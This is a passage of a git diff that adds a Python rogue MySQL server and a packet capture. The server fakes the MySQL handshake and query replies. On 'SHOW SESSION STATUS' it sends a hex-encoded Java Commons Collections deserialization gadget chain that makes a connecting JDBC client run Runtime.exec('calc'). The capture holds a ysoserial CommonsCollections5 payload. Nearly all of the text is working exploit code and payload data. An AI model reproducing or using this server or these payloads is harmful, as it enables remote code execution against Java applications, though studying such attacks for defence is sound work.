payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878' + return payload_content + +def get_data(pdata = b''): + global SHOW_VARIABLES + if b'SHOW VARIABLE' in pdata.upper(): + print("回显变量") + SHOW_VARIABLES = True + return "01000001025200000203646566001173657373696f6e5f7661726961626c65731173657373696f6e5f7661726961626c65730d5661726961626c655f6e616d650d5661726961626c655f6e616d650c2100c0000000fd01100000004200000303646566001173657373696f6e5f7661726961626c65731173657373696f6e5f7661726961626c65730556616c75650556616c75650c2100000c0000fd000000000005000004fe000022001a000005146368617261637465725f7365745f636c69656e7404757466381e000006186368617261637465725f7365745f636f6e6e656374696f6e04757466381b000007156368617261637465725f7365745f726573756c747304757466381a000008146368617261637465725f7365745f73657276657204757466381c0000090c696e69745f636f6e6e6563740e534554204e414d455320757466381800000a13696e7465726163746976655f74696d656f7574033132301900000b166c6f7765725f636173655f7461626c655f6e616d657301311c00000c126d61785f616c6c6f7765645f7061636b65740831363737373231361800000d116e65745f6275666665725f6c656e6774680531363338341500000e116e65745f77726974655f74696d656f75740236301900000f1071756572795f63616368655f73697a650731303438353736150000101071756572795f63616368655f74797065034f4646930000110873716c5f6d6f6465894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e120000121073797374656d5f74696d655f7a6f6e6500110000130974696d655f7a6f6e650653595354454d26000014157472616e73616374696f6e5f69736f6c6174696f6e0f52455045415441424c452d524541441d0000150c74785f69736f6c6174696f6e0f52455045415441424c452d52454144110000160c776169745f74696d656f75740331323005000017fe01002200" + elif b'SHOW WARNINGS' in pdata.upper(): + print("回显告警") + return "01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000005000005fe000002006a000006075761726e696e6704313336365c496e636f727265637420737472696e672076616c75653a20275c7844365c7844305c7842395c7846415c7842315c7845412e2e2e2720666f7220636f6c756d6e20275641524941424c455f56414c55452720617420726f772034383505000007fe00000200" + elif b'SELECT @@session.auto_increment_increment'.upper() in pdata.upper(): + print("回显auto_increment_increment") + return "0100000101380000020364656600000022404073657373696f6e2e6175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a00000000005000003fe0000020002000004013105000005fe00000200" + elif b'SELECT @@session.autocommit'.upper() in pdata.upper(): + print("回显autocommit") + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + elif b'SHOW COLLATION' in pdata.upper(): + print("回显COLLATION") + return "0100000106530000020364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5309436f6c6c6174696f6e0e434f4c4c4154494f4e5f4e414d450c210060000000fd0100000000550000030364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530743686172736574124348415241435445525f5345545f4e414d450c210060000000fd0100000000400000040364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530249640249440c3f000b0000000801000000004d0000050364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530744656661756c740a49535f44454641554c540c210009000000fd01000000004f0000060364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5308436f6d70696c65640b49535f434f4d50494c45440c210009000000fd01000000004a0000070364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5307536f72746c656e07534f52544c454e0c3f000300000008010000000005000008fe00002200210000090f626967355f6368696e6573655f636904626967350131035965730359657301311800000a08626967355f62696e0462696735023834000359657301312100000b0f646563385f737765646973685f636904646563380133035965730359657301311800000c08646563385f62696e0464656338023639000359657301312300000d1063703835305f67656e6572616c5f63690563703835300134035965730359657301311a00000e0963703835305f62696e056370383530023830000359657301311f00000f0e6870385f656e676c6973685f63690368703801360359657303596573013116000010076870385f62696e036870380237320003596573013123000011106b6f6938725f67656e6572616c5f6369056b6f6938720137035965730359657301311a000012096b6f6938725f62696e056b6f6938720237340003596573013122000013116c6174696e315f6765726d616e315f6369066c6174696e3101350003596573013125000014116c6174696e315f737765646973685f6369066c6174696e3101380359657303596573013122000015106c6174696e315f64616e6973685f6369066c6174696e310231350003596573013123000016116c6174696e315f6765726d616e325f6369066c6174696e31023331000359657301321c0000170a6c6174696e315f62696e066c6174696e310234370003596573013123000018116c6174696e315f67656e6572616c5f6369066c6174696e310234380003596573013123000019116c6174696e315f67656e6572616c5f6373066c6174696e31023439000359657301312300001a116c6174696e315f7370616e6973685f6369066c6174696e31023934000359657301312000001b0f6c6174696e325f637a6563685f6373066c6174696e320132000359657301342500001c116c6174696e325f67656e6572616c5f6369066c6174696e320139035965730359657301312500001d136c6174696e325f68756e67617269616e5f6369066c6174696e32023231000359657301312400001e126c6174696e325f63726f617469616e5f6369066c6174696e32023237000359657301311c00001f0a6c6174696e325f62696e066c6174696e3202373700035965730131220000200f737765375f737765646973685f63690473776537023130035965730359657301311800002108737765375f62696e047377653702383200035965730131240000221061736369695f67656e6572616c5f6369056173636969023131035965730359657301311a0000230961736369695f62696e056173636969023635000359657301312300002410756a69735f6a6170616e6573655f636904756a6973023132035965730359657301311800002508756a69735f62696e04756a6973023931000359657301312300002610736a69735f6a6170616e6573655f636904736a6973023133035965730359657301311800002708736a69735f62696e04736a69730238380003596573013126000028116865627265775f67656e6572616c5f636906686562726577023136035965730359657301311c0000290a6865627265775f62696e06686562726577023731000359657301312300002a0e7469733632305f746861695f636906746973363230023138035965730359657301341c00002b0a7469733632305f62696e06746973363230023839000359657301312300002c0f6575636b725f6b6f7265616e5f6369056575636b72023139035965730359657301311a00002d096575636b725f62696e056575636b72023835000359657301312400002e106b6f6938755f67656e6572616c5f6369056b6f693875023232035965730359657301311a00002f096b6f6938755f62696e056b6f6938750237350003596573013126000030116762323331325f6368696e6573655f636906676232333132023234035965730359657301311c0000310a6762323331325f62696e06676232333132023836000359657301312400003210677265656b5f67656e6572616c5f636905677265656b023235035965730359657301311a00003309677265656b5f62696e05677265656b0237300003596573013126000034116370313235305f67656e6572616c5f63690663703132353002323603596573035965730131210000350f6370313235305f637a6563685f6373066370313235300233340003596573013224000036126370313235305f63726f617469616e5f636906637031323530023434000359657301311c0000370a6370313235305f62696e066370313235300236360003596573013122000038106370313235305f706f6c6973685f63690663703132353002393900035965730131200000390e67626b5f6368696e6573655f63690367626b023238035965730359657301311600003a0767626b5f62696e0367626b023837000359657301312600003b116c6174696e355f7475726b6973685f6369066c6174696e35023330035965730359657301311c00003c0a6c6174696e355f62696e066c6174696e35023738000359657301312a00003d1361726d73636969385f67656e6572616c5f63690861726d7363696938023332035965730359657301312000003e0c61726d73636969385f62696e0861726d7363696938023634000359657301312200003f0f757466385f67656e6572616c5f63690475746638023333035965730359657301311800004008757466385f62696e047574663802383300035965730131200000410f757466385f756e69636f64655f6369047574663803313932000359657301382200004211757466385f6963656c616e6469635f636904757466380331393300035965730138200000430f757466385f6c61747669616e5f6369047574663803313934000359657301382100004410757466385f726f6d616e69616e5f6369047574663803313935000359657301382200004511757466385f736c6f76656e69616e5f6369047574663803313936000359657301381f0000460e757466385f706f6c6973685f6369047574663803313937000359657301382100004710757466385f6573746f6e69616e5f636904757466380331393800035965730138200000480f757466385f7370616e6973685f636904757466380331393900035965730138200000490f757466385f737765646973685f6369047574663803323030000359657301382000004a0f757466385f7475726b6973685f6369047574663803323031000359657301381e00004b0d757466385f637a6563685f6369047574663803323032000359657301381f00004c0e757466385f64616e6973685f6369047574663803323033000359657301382300004d12757466385f6c69746875616e69616e5f6369047574663803323034000359657301381f00004e0e757466385f736c6f76616b5f6369047574663803323035000359657301382100004f10757466385f7370616e697368325f6369047574663803323036000359657301381e0000500d757466385f726f6d616e5f636904757466380332303700035965730138200000510f757466385f7065727369616e5f6369047574663803323038000359657301382200005211757466385f6573706572616e746f5f6369047574663803323039000359657301382200005311757466385f68756e67617269616e5f636904757466380332313000035965730138200000540f757466385f73696e68616c615f636904757466380332313100035965730138200000550f757466385f6765726d616e325f6369047574663803323132000359657301382100005610757466385f63726f617469616e5f6369047574663803323133000359657301382400005713757466385f756e69636f64655f3532305f6369047574663803323134000359657301382300005812757466385f766965746e616d6573655f6369047574663803323135000359657301382900005918757466385f67656e6572616c5f6d7973716c3530305f6369047574663803323233000359657301312200005a0f756373325f67656e6572616c5f63690475637332023335035965730359657301311800005b08756373325f62696e0475637332023930000359657301312000005c0f756373325f756e69636f64655f6369047563733203313238000359657301382200005d11756373325f6963656c616e6469635f6369047563733203313239000359657301382000005e0f756373325f6c61747669616e5f6369047563733203313330000359657301382100005f10756373325f726f6d616e69616e5f6369047563733203313331000359657301382200006011756373325f736c6f76656e69616e5f6369047563733203313332000359657301381f0000610e756373325f706f6c6973685f6369047563733203313333000359657301382100006210756373325f6573746f6e69616e5f636904756373320331333400035965730138200000630f756373325f7370616e6973685f636904756373320331333500035965730138200000640f756373325f737765646973685f636904756373320331333600035965730138200000650f756373325f7475726b6973685f6369047563733203313337000359657301381e0000660d756373325f637a6563685f6369047563733203313338000359657301381f0000670e756373325f64616e6973685f6369047563733203313339000359657301382300006812756373325f6c69746875616e69616e5f6369047563733203313430000359657301381f0000690e756373325f736c6f76616b5f6369047563733203313431000359657301382100006a10756373325f7370616e697368325f6369047563733203313432000359657301381e00006b0d756373325f726f6d616e5f6369047563733203313433000359657301382000006c0f756373325f7065727369616e5f6369047563733203313434000359657301382200006d11756373325f6573706572616e746f5f6369047563733203313435000359657301382200006e11756373325f68756e67617269616e5f6369047563733203313436000359657301382000006f0f756373325f73696e68616c615f636904756373320331343700035965730138200000700f756373325f6765726d616e325f6369047563733203313438000359657301382100007110756373325f63726f617469616e5f6369047563733203313439000359657301382400007213756373325f756e69636f64655f3532305f6369047563733203313530000359657301382300007312756373325f766965746e616d6573655f6369047563733203313531000359657301382900007418756373325f67656e6572616c5f6d7973716c3530305f636904756373320331353900035965730131240000751063703836365f67656e6572616c5f6369056370383636023336035965730359657301311a0000760963703836365f62696e0563703836360236380003596573013128000077126b6579626373325f67656e6572616c5f6369076b657962637332023337035965730359657301311e0000780b6b6579626373325f62696e076b6579626373320237330003596573013124000079106d616363655f67656e6572616c5f6369056d61636365023338035965730359657301311a00007a096d616363655f62696e056d61636365023433000359657301312a00007b136d6163726f6d616e5f67656e6572616c5f6369086d6163726f6d616e023339035965730359657301312000007c0c6d6163726f6d616e5f62696e086d6163726f6d616e023533000359657301312400007d1063703835325f67656e6572616c5f6369056370383532023430035965730359657301311a00007e0963703835325f62696e056370383532023831000359657301312400007f126c6174696e375f6573746f6e69616e5f6373066c6174696e370232300003596573013126000080116c6174696e375f67656e6572616c5f6369066c6174696e370234310359657303596573013123000081116c6174696e375f67656e6572616c5f6373066c6174696e37023432000359657301311c0000820a6c6174696e375f62696e066c6174696e37023739000359657301312800008312757466386d62345f67656e6572616c5f636907757466386d6234023435035965730359657301311e0000840b757466386d62345f62696e07757466386d6234023436000359657301312600008512757466386d62345f756e69636f64655f636907757466386d623403323234000359657301382800008614757466386d62345f6963656c616e6469635f636907757466386d623403323235000359657301382600008712757466386d62345f6c61747669616e5f636907757466386d623403323236000359657301382700008813757466386d62345f726f6d616e69616e5f636907757466386d623403323237000359657301382800008914757466386d62345f736c6f76656e69616e5f636907757466386d623403323238000359657301382500008a11757466386d62345f706f6c6973685f636907757466386d623403323239000359657301382700008b13757466386d62345f6573746f6e69616e5f636907757466386d623403323330000359657301382600008c12757466386d62345f7370616e6973685f636907757466386d623403323331000359657301382600008d12757466386d62345f737765646973685f636907757466386d623403323332000359657301382600008e12757466386d62345f7475726b6973685f636907757466386d623403323333000359657301382400008f10757466386d62345f637a6563685f636907757466386d623403323334000359657301382500009011757466386d62345f64616e6973685f636907757466386d623403323335000359657301382900009115757466386d62345f6c69746875616e69616e5f636907757466386d623403323336000359657301382500009211757466386d62345f736c6f76616b5f636907757466386d623403323337000359657301382700009313757466386d62345f7370616e697368325f636907757466386d623403323338000359657301382400009410757466386d62345f726f6d616e5f636907757466386d623403323339000359657301382600009512757466386d62345f7065727369616e5f636907757466386d623403323430000359657301382800009614757466386d62345f6573706572616e746f5f636907757466386d623403323431000359657301382800009714757466386d62345f68756e67617269616e5f636907757466386d623403323432000359657301382600009812757466386d62345f73696e68616c615f636907757466386d623403323433000359657301382600009912757466386d62345f6765726d616e325f636907757466386d623403323434000359657301382700009a13757466386d62345f63726f617469616e5f636907757466386d623403323435000359657301382a00009b16757466386d62345f756e69636f64655f3532305f636907757466386d623403323436000359657301382900009c15757466386d62345f766965746e616d6573655f636907757466386d623403323437000359657301382500009d136370313235315f62756c67617269616e5f636906637031323531023134000359657301312500009e136370313235315f756b7261696e69616e5f636906637031323531023233000359657301311c00009f0a6370313235315f62696e0663703132353102353000035965730131260000a0116370313235315f67656e6572616c5f63690663703132353102353103596573035965730131230000a1116370313235315f67656e6572616c5f63730663703132353102353200035965730131240000a21075746631365f67656e6572616c5f6369057574663136023534035965730359657301311a0000a30975746631365f62696e05757466313602353500035965730131220000a41075746631365f756e69636f64655f63690575746631360331303100035965730138240000a51275746631365f6963656c616e6469635f63690575746631360331303200035965730138220000a61075746631365f6c61747669616e5f63690575746631360331303300035965730138230000a71175746631365f726f6d616e69616e5f63690575746631360331303400035965730138240000a81275746631365f736c6f76656e69616e5f63690575746631360331303500035965730138210000a90f75746631365f706f6c6973685f63690575746631360331303600035965730138230000aa1175746631365f6573746f6e69616e5f63690575746631360331303700035965730138220000ab1075746631365f7370616e6973685f63690575746631360331303800035965730138220000ac1075746631365f737765646973685f63690575746631360331303900035965730138220000ad1075746631365f7475726b6973685f63690575746631360331313000035965730138200000ae0e75746631365f637a6563685f63690575746631360331313100035965730138210000af0f75746631365f64616e6973685f63690575746631360331313200035965730138250000b01375746631365f6c69746875616e69616e5f63690575746631360331313300035965730138210000b10f75746631365f736c6f76616b5f63690575746631360331313400035965730138230000b21175746631365f7370616e697368325f63690575746631360331313500035965730138200000b30e75746631365f726f6d616e5f63690575746631360331313600035965730138220000b41075746631365f7065727369616e5f63690575746631360331313700035965730138240000b51275746631365f6573706572616e746f5f63690575746631360331313800035965730138240000b61275746631365f68756e67617269616e5f63690575746631360331313900035965730138220000b71075746631365f73696e68616c615f63690575746631360331323000035965730138220000b81075746631365f6765726d616e325f63690575746631360331323100035965730138230000b91175746631365f63726f617469616e5f63690575746631360331323200035965730138260000ba1475746631365f756e69636f64655f3532305f63690575746631360331323300035965730138250000bb1375746631365f766965746e616d6573655f63690575746631360331323400035965730138280000bc1275746631366c655f67656e6572616c5f63690775746631366c65023536035965730359657301311e0000bd0b75746631366c655f62696e0775746631366c6502363200035965730131260000be116370313235365f67656e6572616c5f636906637031323536023537035965730359657301311c0000bf0a6370313235365f62696e0663703132353602363700035965730131260000c0146370313235375f6c69746875616e69616e5f636906637031323537023239000359657301311c0000c10a6370313235375f62696e0663703132353702353800035965730131260000c2116370313235375f67656e6572616c5f63690663703132353702353903596573035965730131240000c31075746633325f67656e6572616c5f6369057574663332023630035965730359657301311a0000c40975746633325f62696e05757466333202363100035965730131220000c51075746633325f756e69636f64655f63690575746633320331363000035965730138240000c61275746633325f6963656c616e6469635f63690575746633320331363100035965730138220000c71075746633325f6c61747669616e5f63690575746633320331363200035965730138230000c81175746633325f726f6d616e69616e5f63690575746633320331363300035965730138240000c91275746633325f736c6f76656e69616e5f63690575746633320331363400035965730138210000ca0f75746633325f706f6c6973685f63690575746633320331363500035965730138230000cb1175746633325f6573746f6e69616e5f63690575746633320331363600035965730138220000cc1075746633325f7370616e6973685f63690575746633320331363700035965730138220000cd1075746633325f737765646973685f63690575746633320331363800035965730138220000ce1075746633325f7475726b6973685f63690575746633320331363900035965730138200000cf0e75746633325f637a6563685f63690575746633320331373000035965730138210000d00f75746633325f64616e6973685f63690575746633320331373100035965730138250000d11375746633325f6c69746875616e69616e5f63690575746633320331373200035965730138210000d20f75746633325f736c6f76616b5f63690575746633320331373300035965730138230000d31175746633325f7370616e697368325f63690575746633320331373400035965730138200000d40e75746633325f726f6d616e5f63690575746633320331373500035965730138220000d51075746633325f7065727369616e5f63690575746633320331373600035965730138240000d61275746633325f6573706572616e746f5f63690575746633320331373700035965730138240000d71275746633325f68756e67617269616e5f63690575746633320331373800035965730138220000d81075746633325f73696e68616c615f63690575746633320331373900035965730138220000d91075746633325f6765726d616e325f63690575746633320331383000035965730138230000da1175746633325f63726f617469616e5f63690575746633320331383100035965730138260000db1475746633325f756e69636f64655f3532305f63690575746633320331383200035965730138250000dc1375746633325f766965746e616d6573655f636905757466333203313833000359657301381b0000dd0662696e6172790662696e61727902363303596573035965730131280000de1267656f737464385f67656e6572616c5f63690767656f73746438023932035965730359657301311e0000df0b67656f737464385f62696e0767656f7374643802393300035965730131250000e01163703933325f6a6170616e6573655f6369056370393332023935035965730359657301311a0000e10963703933325f62696e05637039333202393600035965730131290000e2136575636a706d735f6a6170616e6573655f6369076575636a706d73023937035965730359657301311e0000e30b6575636a706d735f62696e076575636a706d7302393800035965730131290000e412676231383033305f6368696e6573655f6369076762313830333003323438035965730359657301321f0000e50b676231383033305f62696e076762313830333003323439000359657301312a0000e616676231383033305f756e69636f64655f3532305f636907676231383033300332353000035965730138050000e7fe00002200" + elif b'SET ' in pdata.upper(): + print("回显SET包") + return "0700000200000002000000" + else: + print("未知请求") + print(pdata) + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + +def process(conn): + global SHOW_VARIABLES + #hello 包 + print("发送hello包") + conn.sendall(bytes.fromhex("4a0000000a352e372e32360018000000374a10207a5f771e00fff7c00200ff81150000000000000000000025551379067c13160d46727b006d7973716c5f6e61746976655f70617373776f726400")) + + # 接收登录包 + conn.recv(10240) + print("接收到登录包") + + # 登录成功包 + conn.sendall(bytes.fromhex("0700000200000002000000")) + print("给客户端响应登录成功") + + while True: + data = conn.recv(10240) + if b'SHOW SESSION STATUS' in data.upper(): + conn.sendall(bytes.fromhex("0100000103")) + conn.sendall(bytes.fromhex("1a000002036465660001610161016101610c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("1a000003036465660001610161016201620c3f001c000000fcffff0000001a000004036465660001610161016301630c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("05000005fe00000200")) + payload_content = get_payload_content() + mysql_data = "" + payload_length = str(hex(len(payload_content) // 2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + data_len = str(hex(len(payload_content) // 2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc' + payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + conn.sendall(bytes.fromhex(mysql_data)) + print("交互完成") + else: + conn.sendall(bytes.fromhex(get_data(data))) + +sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +sk.bind(("0.0.0.0", 3307)) +sk.listen(1) + +while True: + conn, addr = sk.accept() + threading.Thread(target=process, args=(conn,)).start() \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/hex.pcap b/PyCharm/JDBC/Mysql/hex.pcap new file mode 100644 index 0000000..d04bd06 Binary files /dev/null and b/PyCharm/JDBC/Mysql/hex.pcap differ diff --git a/PyCharm/JDBC/Mysql/hex.txt b/PyCharm/JDBC/Mysql/hex.txt new file mode 100644 index 0000000..7805cfe --- /dev/null +++ b/PyCharm/JDBC/Mysql/hex.txt @@ -0,0 +1,6 @@ +4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400 +ee0000018fa23a01ffffff00210000000000000000000000000000000000000000000000726f6f740014de2610f806e26176c3dec080531f4d0a0666cd1874657374006d7973716c5f6e61746976655f70617373776f7264008b105f72756e74696d655f76657273696f6e09312e382e305f3334310f5f636c69656e745f76657273696f6e06352e312e34370c5f636c69656e745f6e616d65144d7953514c20436f6e6e6563746f72204a6176610f5f636c69656e745f6c6963656e73650347504c0f5f72756e74696d655f76656e646f72124f7261636c6520436f72706f726174696f6e00000000000000000000000000 +0700000200000002000000 +140000000353484f572053455353494f4e20535441545553 +01000001021a000002036465660001630163016301630c3f00ffff0000fc90000000001a000003036465660001630163016301630c3f00ffff0000fc9000000000c10e0004fbfcbd0eaced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000277372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000004474002f6d652e6c307475732e79736f73657269616c2e7061796c6f6164732e436f6d6d6f6e73436f6c6c656374696f6e7335740018436f6d6d6f6e73436f6c6c656374696f6e73352e6a6176617400096765744f626a6563747371007e000b0000003071007e000d71007e000e71007e000f7371007e000b0000011a74001779736f73657269616c2e6775692e59736f466f726d243174000c59736f466f726d2e6a61766174000f616374696f6e506572666f726d65647371007e000b000007e674001a6a617661782e7377696e672e4162737472616374427574746f6e7400134162737472616374427574746f6e2e6a61766174001366697265416374696f6e506572666f726d65647371007e000b0000092c7400226a617661782e7377696e672e4162737472616374427574746f6e2448616e646c657271007e001771007e00147371007e000b0000019274001e6a617661782e7377696e672e44656661756c74427574746f6e4d6f64656c74001744656661756c74427574746f6e4d6f64656c2e6a61766171007e00187371007e000b0000010371007e001c71007e001d74000a736574507265737365647371007e000b0000010674002a6a617661782e7377696e672e706c61662e62617369632e4261736963427574746f6e4c697374656e65727400184261736963427574746f6e4c697374656e65722e6a61766174000d6d6f75736552656c65617365647371007e000b0000198b7400126a6176612e6177742e436f6d706f6e656e7474000e436f6d706f6e656e742e6a61766174001170726f636573734d6f7573654576656e747371007e000b00000cf67400166a617661782e7377696e672e4a436f6d706f6e656e7474000f4a436f6d706f6e656e742e6a61766171007e00277371007e000b000018a071007e002571007e002674000c70726f636573734576656e747371007e000b000008bf7400126a6176612e6177742e436f6e7461696e657274000e436f6e7461696e65722e6a61766171007e002c7371007e000b0000131971007e002571007e002674001164697370617463684576656e74496d706c7371007e000b000008f971007e002e71007e002f71007e00317371007e000b0000126771007e002571007e002674000d64697370617463684576656e747371007e000b0000132874001e6a6176612e6177742e4c696768747765696768744469737061746368657271007e002f74001272657461726765744d6f7573654576656e747371007e000b000011b771007e003671007e002f71007e00277371007e000b0000117c71007e003671007e002f71007e00347371007e000b000008eb71007e002e71007e002f71007e00317371007e000b00000aba74000f6a6176612e6177742e57696e646f7774000b57696e646f772e6a61766171007e00317371007e000b0000126771007e002571007e002671007e00347371007e000b000002f87400136a6176612e6177742e4576656e74517565756574000f4576656e7451756575652e6a61766171007e00317371007e000b0000006171007e004071007e004174000a616363657373243530307371007e000b000002c57400156a6176612e6177742e4576656e745175657565243371007e004174000372756e7371007e000b000002bf71007e004571007e004171007e00467371007e000bfffffffe74001e6a6176612e73656375726974792e416363657373436f6e74726f6c6c6572740015416363657373436f6e74726f6c6c65722e6a61766174000c646f50726976696c656765647371007e000b0000004a7400356a6176612e73656375726974792e50726f74656374696f6e446f6d61696e244a6176615365637572697479416363657373496d706c74001550726f74656374696f6e446f6d61696e2e6a617661740017646f496e74657273656374696f6e50726976696c6567657371007e000b0000005471007e004d71007e004e71007e004f7371007e000b000002dd7400156a6176612e6177742e4576656e745175657565243471007e004171007e00467371007e000b000002db71007e005271007e004171007e00467371007e000bfffffffe71007e004971007e004a71007e004b7371007e000b0000004a71007e004d71007e004e71007e004f7371007e000b000002da71007e004071007e004171007e00347371007e000b000000cd74001c6a6176612e6177742e4576656e7444697370617463685468726561647400184576656e7444697370617463685468726561642e6a61766174001670756d704f6e654576656e74466f7246696c746572737371007e000b0000007471007e005871007e005974001370756d704576656e7473466f7246696c7465727371007e000b0000006971007e005871007e005974001670756d704576656e7473466f724869657261726368797371007e000b0000006571007e005871007e005974000a70756d704576656e74737371007e000b0000005d71007e005871007e005971007e00607371007e000b0000005271007e005871007e005971007e0046737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e006878737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b657971007e00014c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00017870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e